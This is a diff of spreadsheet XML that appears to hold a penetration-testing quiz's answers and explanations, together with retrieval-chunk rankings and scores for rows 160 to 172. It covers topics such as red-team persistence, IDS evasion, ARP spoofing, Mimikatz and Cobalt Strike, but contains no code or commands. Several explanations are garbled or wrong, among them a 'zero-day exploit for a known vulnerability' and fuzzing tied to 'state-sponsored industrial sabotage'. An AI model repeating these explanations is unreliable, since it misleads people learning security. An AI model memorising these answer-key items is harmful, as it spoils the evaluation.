-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 981fc0fa-1e0e-4f3e-b60a-3e4ba9348569, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: a70a01f4-1ae9-4968-9a6f-92b4d82fb69a, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I160" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J160" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K160" t="inlineStr">
         <is>
@@ -11227,7 +10402,7 @@
       <c r="F161" t="inlineStr">
         <is>
           <t>Answer: Developing a zero-day exploit for a known vulnerable buffer overflow
-Explanation: In the context of red team operations, maintaining stealth and persistence within the target's network is crucial. While fuzzing, exploiting web applications, and brute force attacks can be effective techniques, they are more likely to trigger alarms or be detected by security systems. Developing a zero-day exploit for a known vulnerable buffer overflow allows the red team to craft specific payloads that can exploit vulnerabilities within the target's environment, potentially giving them persistent access through backdoors or rootkits tailored to evade detection by the target's specific security setup.</t>
+Explanation: When conducting a red team operation, maintaining stealth and persistence within the target's network is crucial. While fuzzing commonly used software using generic payloads (Option 1) can be effective in certain situations, it is typically more associated with state-sponsored industrial sabotage. Exploiting public-facing web applications using SQL injection (Option 3) is primarily a method for attacking clients using a vulnerable website and does not inherently provide network-level persistence or stealth needed for long-term operations. Performing a brute force attack on SSH credentials (Option 4) can be effective for gaining initial access, but it is noisy and likely to trigger account lockouts and alerts, which could lead to immediate detection. Developing a zero-day exploit for a known vulnerable buffer overflow (Option 2) is the most effective technique for maintaining long-term access without immediate detection because it allows the red team to craft specific payloads that can exploit vulnerabilities within the target's environment, potentially giving them persistent access through backdoors or rootkits tailored to evade detection by the target's specific security setup.</t>
         </is>
       </c>
       <c r="G161" t="inlineStr">
@@ -11241,21 +10416,16 @@
 preemware_pentestingeval.pdf (Chunk: 83d0221c-27bf-48bf-bd78-86ad35de122e, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 9a3c4886-d3fe-4dee-babc-d721f119b21b, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 342804e1-0c50-49b6-8a32-7e20012536ab, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: e710af68-282f-416e-9fa7-53199146dfe2, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 1f9e7e89-2183-459e-bd33-2b11366de145, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 5f4ba9c9-4739-4151-9e88-342275d06efc, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 5)</t>
         </is>
       </c>
       <c r="I161" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J161" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K161" t="inlineStr">
         <is>
@@ -11294,7 +10464,7 @@
       <c r="F162" t="inlineStr">
         <is>
           <t>Answer: Custom infrastructure assessment using tailored scripts
-Explanation: Modern intrusion detection systems (IDS) are designed to detect and potentially block known malicious traffic patterns and anomalies typically generated by widely recognized tools and methods. Penetration Testing Question &amp; Answer Automated public exploit tools like Metasploit and standard vulnerability scanning software are often signatured by security products, making them more likely to be detected when employed in penetration testing. Catch-the-flag (CTF) competition scenarios, while educational, often utilize similar tools and methodologies that are also detectable by sophisticated IDS setups. In contrast, custom infrastructure assessment using tailored scripts can be specifically designed to avoid common IDS signatures and exploit detection patterns, thereby minimizing the likelihood of triggering alarms. This approach allows pen testers to perform a more stealthy operation, emulating the tactics of advanced adversaries who often use custom and low-profile techniques to evade detection.</t>
+Explanation: Modern intrusion detection systems (IDS) are designed to detect and potentially block known malicious traffic patterns and anomalies typically generated by widely recognized tools and methods. Automated public exploit tools like Metasploit and standard vulnerability scanning software are often signatured by security products, making them more likely to be detected when employed in penetration testing. Catch-the-flag (CTF) competition scenarios, while educational, often utilize similar tools and methodologies that are also detectable by sophisticated IDS setups. In contrast, custom infrastructure assessment using tailored scripts can be specifically designed to avoid common IDS signatures and exploit detection patterns, thereby minimizing the likelihood of triggering alarms. This approach allows pen testers to perform a more stealthy operation, emulating the tactics of advanced adversaries who often use custom and low-profile techniques to evade detection.</t>
         </is>
       </c>
       <c r="G162" t="inlineStr">
@@ -11308,21 +10478,16 @@
 preemware_pentestingeval.pdf (Chunk: 5177461e-afd1-4f30-b34b-33dd723a5123, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 6a3bf430-df4e-48ec-a031-aa60204cb560, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 37a1279b-9bd8-4772-84d8-32116433dad3, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: f53bcf96-b827-40a0-b89b-027325a9a32e, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 7e2feb30-1a3a-4b3e-b712-d9cbf873f1a0, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d6ee2010-4521-4fdb-bc8d-5103053d4db5, Type: sparse, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 53f2edb6-1d2d-4870-ae57-8bfa8a746aa3, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 6bfd15ed-9fdd-4602-827d-fc1e81332c5c, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 54801486-4542-4df6-8d24-be9d01b89403, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: f53bcf96-b827-40a0-b89b-027325a9a32e, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I162" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J162" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K162" t="inlineStr">
         <is>
@@ -11375,21 +10540,16 @@
 preemware_pentestingeval.pdf (Chunk: 0b22159c-ee6c-41f9-88d2-29f41ea39375, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 3cab02c9-e3d9-4f69-b30b-cf3644f3e1c0, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 5177461e-afd1-4f30-b34b-33dd723a5123, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 1788a271-9788-4fa2-a1ab-d1d7f02f5ced, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 4ec985eb-6aff-4249-b9e4-0f5c3aad3885, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 3ce003fc-f967-479a-be9c-461f49ad3c11, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 5177461e-afd1-4f30-b34b-33dd723a5123, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I163" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J163" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K163" t="inlineStr">
         <is>
@@ -11442,21 +10602,16 @@
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: fe3d25bc-d8ae-4c4b-a1a9-0cddb566beef, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 4b09196a-8b79-4c16-a50f-df9b49b8c5ea, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 8f2cb960-4b58-411c-9fc2-893b0101d44a, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: b71718d2-8bfb-4126-9a9d-483a7b3fb627, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 11604430-bce7-4434-9029-c5afcc8d9fca, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I164" t="inlineStr">
         <is>
-          <t>Semantic: 9, Keyword: 1, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J164" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K164" t="inlineStr">
         <is>
@@ -11495,12 +10650,7 @@
       <c r="F165" t="inlineStr">
         <is>
           <t>Answer: Fuzzing the application to identify memory leaks
-Explanation: Fuzzing the application is an effective technique for discovering buffer overflow vulnerabilities. It
-involves providing malformed or unexpected inputs to software components in order to trigger anomalous
-behavior, including crashes, which can indicate memory corruption vulnerabilities that might be exploitable. While
-static code analysis and regular penetration tests can also identify vulnerabilities, they are not as effective at
-discovering buffer overflow vulnerabilities specifically. Decrypting network traffic may reveal plaintext
-credentials but does not directly address buffer overflows.</t>
+Explanation: Fuzzing the application is the most effective method for discovering buffer overflow vulnerabilities. This technique involves sending vast amounts of random data, or 'noise', to application inputs in an attempt to crash the system. Crashes could indicate buffer overflows, which may be exploitable for executing arbitrary code. Static code analysis, while useful for finding security flaws like hard-coded credentials or insecure configurations, is less effective for dynamically identifying runtime vulnerabilities like buffer overflows. Conducting a regular penetration test would cover various types of vulnerabilities but may not specifically target buffer overflow vulnerabilities. Decrypting network traffic to expose plain text credentials is useful for discovering credential-related vulnerabilities but does not directly address buffer overflow issues.</t>
         </is>
       </c>
       <c r="G165" t="inlineStr">
@@ -11514,21 +10664,16 @@
 preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: e79289ff-16f2-4a3d-9cf9-a3a92e8bbfd6, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: afb1aa10-4e40-43c7-8bb6-da790de907eb, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 8d479ebf-923b-4de8-adcf-31ea07821612, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: e32f0786-db66-459f-9257-ca7a63518524, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 86b4e7ca-0f90-495f-8a03-ae7c47e5d3b4, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 04735009-c6ee-4797-bd4b-2a07eaefa023, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I165" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J165" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K165" t="inlineStr">
         <is>
@@ -11567,7 +10712,7 @@
       <c r="F166" t="inlineStr">
         <is>
           <t>Answer: Integer overflow
-Explanation: The correct answer is 'Integer overflow'. This type of vulnerability occurs when an arithmetic operation attempts to create a numeric value that is outside the range that can be represented with a given number of bits. For example, if an attacker inputs a very high value that, when processed by the application, causes a computation error and manipulates the system's memory.</t>
+Explanation: The correct answer is 'Integer overflow'. This type of vulnerability occurs when an arithmetic operation attempts to create a numeric value that is outside the range that can be represented with a given number of bits. For example, if an attacker inputs a very high value that, when processed by the application, causes a computation error and manipulates the system's memory. Stack buffer overflow, format string vulnerability, and cross-site scripting are different classes of vulnerabilities but do not specifically target integer overflows for exploitation.</t>
         </is>
       </c>
       <c r="G166" t="inlineStr">
@@ -11581,21 +10726,16 @@
 preemware_pentestingeval.pdf (Chunk: c9e9ff7d-8a8e-4a80-a12c-716d9a3e415c, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 6ceef267-c6fd-4e8f-b4a3-39d3243f8460, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 2bcd487a-ccce-43e5-ac47-528e0428474b, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 85fe4396-e8ea-4eb1-ac05-327058d16c2f, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 77e097c4-9362-4342-b54a-3107bf3b1601, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 59febbbd-9524-4f04-88ec-fe43e223494f, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 9fa8d825-a542-4bef-bb9f-e7974f65d4a4, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: d81db727-e5e2-44eb-8aa1-20ab3f8883a1, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I166" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J166" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K166" t="inlineStr">
         <is>
@@ -11634,7 +10774,14 @@
       <c r="F167" t="inlineStr">
         <is>
           <t>Answer: Memory corruption
-Explanation: A buffer overflow attack involves writing data beyond the intended space of a buffer, which can lead to memory corruption. This vulnerability is most likely to be exploited by a buffer overflow attack as it allows an attacker to execute arbitrary code or crash the system. Input validation errors and cross-site scripting are related to improper input handling, while side-channel attacks focus on gaining information from the implementation of a system rather than directly corrupting memory or control flow within an application's process.</t>
+Explanation: Memory corruption vulnerabilities such as buffer overflows occur when there is inadequate
+boundary checking or memory management, leading to unintended data being written into adjacent memory
+locations. This can be exploited by an attacker to execute arbitrary code or cause the program to crash. In the
+context of penetration testing, a buffer overflow attack would most likely target a memory corruption
+vulnerability. Input validation errors may contribute to buffer overflows but are not the direct target of such an
+attack. Side-channel attacks involve gaining information from the implementation of a system rather than
+disguising traffic to a server. Cross-site scripting is primarily a concern in web application security, where
+unescaped user input is embedded into responses and leads to script execution in other users' browsers.</t>
         </is>
       </c>
       <c r="G167" t="inlineStr">
@@ -11648,21 +10795,16 @@
 preemware_pentestingeval.pdf (Chunk: 66d16429-d931-4984-bd59-02b90fff1053, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: a6481f2a-4a32-4aab-8afe-82b2253400e6, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 211c6f97-6412-428f-9b6c-66975c93fba1, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: ca58027f-5c3d-4e98-93a5-6f71ac3fc704, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 909291fe-0fc3-4c29-98d3-495115717014, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 011afc4e-bb91-4810-a4fa-6b97859f49a0, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 37f43b1b-776c-4ad7-a565-c62d5b4c3832, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: d1fe78d6-7581-4091-933f-4f2f7f15150f, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: d5fca305-f5ef-4abd-9f0a-9d6b637600fe, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I167" t="inlineStr">
         <is>
-          <t>Semantic: 8, Keyword: 2, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J167" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K167" t="inlineStr">
         <is>
@@ -11701,7 +10843,7 @@
       <c r="F168" t="inlineStr">
         <is>
           <t>Answer: Mimikatz
-Explanation: Mimikatz is specifically designed for extracting plaintext passwords and other sensitive data from the memory of Windows systems. It exploits vulnerabilities in Windows security mechanisms or mishandlings like pass-the-hash or pass-the-ticket to acquire credentials. VeraCrypt is used for disk encryption, KeeFarce extracts credentials from KeePass password management software and is irrelevant to extracting general passwords directly from system memory, while John the Ripper is primarily a password cracker focused on cracking password hashes through dictionary, brute force, or other methods rather than extracting them from memory.</t>
+Explanation: Mimikatz is specifically designed for extracting plaintext passwords and other sensitive data from the memory of Windows systems. It exploits vulnerabilities in Windows security mechanisms or mishandlings like pass-the-hash or pass-the-ticket to acquire credentials. VeraCrypt is used for disk encryption, not for extracting passwords from memory. KeeFarce extracts credentials from KeePass password management software and is irrelevant to extracting general passwords directly from system memory. John the Ripper is primarily a password cracker, focused on cracking password hashes through dictionary, brute force, or other methods, rather than extracting them from memory.</t>
         </is>
       </c>
       <c r="G168" t="inlineStr">
@@ -11715,21 +10857,16 @@
 preemware_pentestingeval.pdf (Chunk: 0e3b5bb4-eb06-4257-ab62-97c3f78afa53, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 2284c68d-f358-4abf-bedb-673c5c8ca0d7, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: ca5d3a49-3c09-4a73-8dbf-43188a8e0fdf, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: sparse, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 91d370a9-8209-4668-b903-1708398faa93, Type: sparse, Rank: 7)
-cowWhySo-pentest-redteam-steering.md (Chunk: 07d86e21-75c1-4d1f-9cfa-6963e9e531cd, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: a13397f3-c101-493a-9eb4-6fb992844cd2, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 15baa0d1-21f6-46e4-85b4-3ffb3cb51be3, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 7f4cba70-0971-4a0a-8dd8-1a86821cdef1, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I168" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 4, Keyword: 1, Total: 5</t>
         </is>
       </c>
       <c r="J168" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K168" t="inlineStr">
         <is>
@@ -11768,7 +10905,7 @@
       <c r="F169" t="inlineStr">
         <is>
           <t>Answer: ARP spoofing
-Explanation: ARP (Address Resolution Protocol) spoofing is the most effective technique for manipulating network traffic between two hosts on the same subnet. ARP spoofing involves sending false ARP messages over a local area network (LAN). This results in the linking of an attacker's MAC address with the IP address of a legitimate computer or server on the network. Once the attacker has redirected the traffic to their machine, they can intercept, modify, or block data transmitted between the original hosts. Packet filtering and port scanning are helpful for different purposes: packet filtering is used for blocking or allowing data based on IP address and port numbers, and port scanning is a technique for identifying available services or vulnerabilities on network devices. DNS sinkholing involves redirecting traffic away from malicious sites at the DNS layer and would not be effective for data interception between hosts on the same network.</t>
+Explanation: ARP (Address Resolution Protocol) spoofing is the most effective technique for manipulating network traffic between two hosts on the same subnet. By sending false ARP messages over a local area network, an attacker can link their MAC address with the IP address of a legitimate computer or server on the network. This allows them to intercept, modify, or block data transmitted between the original hosts. Packet filtering and port scanning are helpful for different purposes: packet filtering is used for blocking or allowing data based on IP address and port numbers, and port scanning is a technique for identifying available services or vulnerabilities on network devices. DNS sinkholing involves redirecting traffic away from malicious sites at the DNS layer and would not be effective for data interception between hosts on the same network.</t>
         </is>
       </c>
       <c r="G169" t="inlineStr">
@@ -11782,21 +10919,16 @@
 preemware_pentestingeval.pdf (Chunk: 11de848f-7183-4deb-a4b1-aadd9133c4e9, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 266e5920-7591-433f-b5e2-bb81b3aa6004, Type: sparse, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 696c12ad-676b-479b-a2f2-cde8fd35dbfa, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 0d8989d4-0328-4433-bd0a-2773b932aaa7, Type: sparse, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 8563d025-3930-45a0-b79e-535960ea51b3, Type: sparse, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: 2c921c88-12fa-4411-aa17-010f9d3e1f0b, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I169" t="inlineStr">
         <is>
-          <t>Semantic: 6, Keyword: 4, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J169" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K169" t="inlineStr">
         <is>
@@ -11835,7 +10967,7 @@
       <c r="F170" t="inlineStr">
         <is>
           <t>Answer: Social engineering and phishing attacks
-Explanation: In scenarios where a server is well-patched and protected by strict firewall rules, traditional network-based exploits, such as buffer overflow or SQL injection, are less likely to succeed due to the robust security measures in place which often include up-to-date patches and strict filtering rules. Man-in-the-middle (MITM) attacks would require specific network conditions and are similarly ineffective against well-secured, encrypted traffic. In contrast, social engineering and phishing attacks target the human element, which is more likely to be less secure and can provide access to internal network resources.</t>
+Explanation: In scenarios where a server is well-patched and protected by strict firewall rules, traditional network-based exploits, such as buffer overflow or SQL injection, are less likely to succeed due to the robust security measures in place which often include up-to-date patches and strict filtering rules. Man-in-the-middle (MITM) attacks would require specific network conditions and are similarly ineffective against well-secured, encrypted traffic. In contrast, social engineering and phishing attacks target the human element, which is more likely to be vulnerable to exploitation.</t>
         </is>
       </c>
       <c r="G170" t="inlineStr">
@@ -11849,21 +10981,16 @@
 preemware_pentestingeval.pdf (Chunk: a3791861-a89a-4276-8892-65542342ae11, Type: sparse, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: afdc7c73-427b-4da6-8482-3f723c306b99, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 25f16021-0dc2-4174-b5ce-b7e5db9c8551, Type: sparse, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 527adef7-76ea-429f-b95c-1ddd1d3fc7cb, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: 093ba00d-947f-4916-ad84-551758243b8e, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: 431cd243-ba5f-48ae-8a82-2e3831f3a74b, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: f3e9031e-a33d-4118-b256-b8f4e197689f, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c8526d10-31df-4fac-9a82-6d9008822382, Type: sparse, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: 33faa168-7953-48fd-a109-3efbdaec8d52, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I170" t="inlineStr">
         <is>
-          <t>Semantic: 7, Keyword: 3, Total: 10</t>
+          <t>Semantic: 3, Keyword: 2, Total: 5</t>
         </is>
       </c>
       <c r="J170" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K170" t="inlineStr">
         <is>
@@ -11902,15 +11029,7 @@
       <c r="F171" t="inlineStr">
         <is>
           <t>Answer: Injecting fault into cryptographic operations
-Explanation: Injecting faults into cryptographic operations is a sophisticated technique used in advanced
-persistent threat scenarios, particularly because it can compromise data integrity and confidentiality directly by
-tampering with the encryption processes. This method is stealthy as it does not typically generate anomalous
-network traffic that can be detected by IDS, unlike the other listed methods. Discovering Bluetooth devices, while
-potentially useful, is more relevant for local proximity attacks and does not pertain to extracting data covertly
-across networks. Using an SQL Injection to bypass authentication is a common attack vector but is generally
-detectable by IDS due to the abnormal query patterns and log entries. Sending crafted ICMP packets to cause
-buffer overflow can lead to crashes or unintended behavior, but it's less effective for data extraction and more
-suited for general network disruption.</t>
+Explanation: Injecting faults into cryptographic operations is a sophisticated technique used in advanced persistent threat scenarios, particularly because it can compromise data integrity and confidentiality directly by tampering with the encryption processes. This method is stealthy as it does not typically generate anomalous network traffic that can be detected by IDS, unlike the other listed methods. Discovering Bluetooth devices, while potentially useful, is more relevant for local proximity attacks and does not pertain to extracting data covertly across networks. Using an SQL Injection to bypass authentication is a common attack vector but is generally detectable by IDS due to the abnormal query patterns and log entries. Sending crafted ICMP packets to cause buffer overflow can potentially trigger IDS if it's configured to monitor for such activities.</t>
         </is>
       </c>
       <c r="G171" t="inlineStr">
@@ -11924,21 +11043,16 @@
 preemware_pentestingeval.pdf (Chunk: c96d3d37-95b2-4aeb-8985-05b07bc002c3, Type: dense, Rank: 2)
 preemware_pentestingeval.pdf (Chunk: 7e2feb30-1a3a-4b3e-b712-d9cbf873f1a0, Type: dense, Rank: 3)
 preemware_pentestingeval.pdf (Chunk: 1690ea12-e09b-40e0-b6aa-debcaf222400, Type: dense, Rank: 4)
-preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 5)
-preemware_pentestingeval.pdf (Chunk: 3e095748-6dd4-44d6-8e21-eb9b87bf17f2, Type: dense, Rank: 6)
-preemware_pentestingeval.pdf (Chunk: e6bb4394-5e47-4173-9cf3-8ca006a917b6, Type: dense, Rank: 7)
-preemware_pentestingeval.pdf (Chunk: c0eaca88-9ae9-4e88-851c-9feb19c23d7f, Type: dense, Rank: 8)
-preemware_pentestingeval.pdf (Chunk: 54db32bd-27d9-46d8-9de5-8da86ed6b7a9, Type: dense, Rank: 9)
-preemware_pentestingeval.pdf (Chunk: c3733381-22bb-4b09-9b55-0aee742f1d93, Type: dense, Rank: 10)</t>
+preemware_pentestingeval.pdf (Chunk: c6500d0e-da39-426c-8be8-98d4aad9220f, Type: dense, Rank: 5)</t>
         </is>
       </c>
       <c r="I171" t="inlineStr">
         <is>
-          <t>Semantic: 10, Keyword: 0, Total: 10</t>
+          <t>Semantic: 5, Keyword: 0, Total: 5</t>
         </is>
       </c>
       <c r="J171" t="n">
-        <v>10</v>
+        <v>5</v>
       </c>
       <c r="K171" t="inlineStr">
         <is>
@@ -11977,7 +11091,7 @@
       <c r="F172" t="inlineStr">
         <is>
           <t>Answer: Cobalt Strike
-Explanation: Cobalt Strike is a commercial software used for red team operations that specializes in post-exploitation activities and establishing persistent command and control (C2) communications. This makes it highly suitable for maintaining long-term access to compromised targets within a network. Metasploit, while powerful for exploitation and initial payload delivery, is typically less focused on long-term persistence compared to Cobalt Strike. Burp Suite is primarily used for web application security testing and is not focused on post-exploitation or command and control. Wireshark is a network protocol analyzer used for capturing and analyzing packet data, but it does not establish persistent command and control communication with compromised targets.</t>
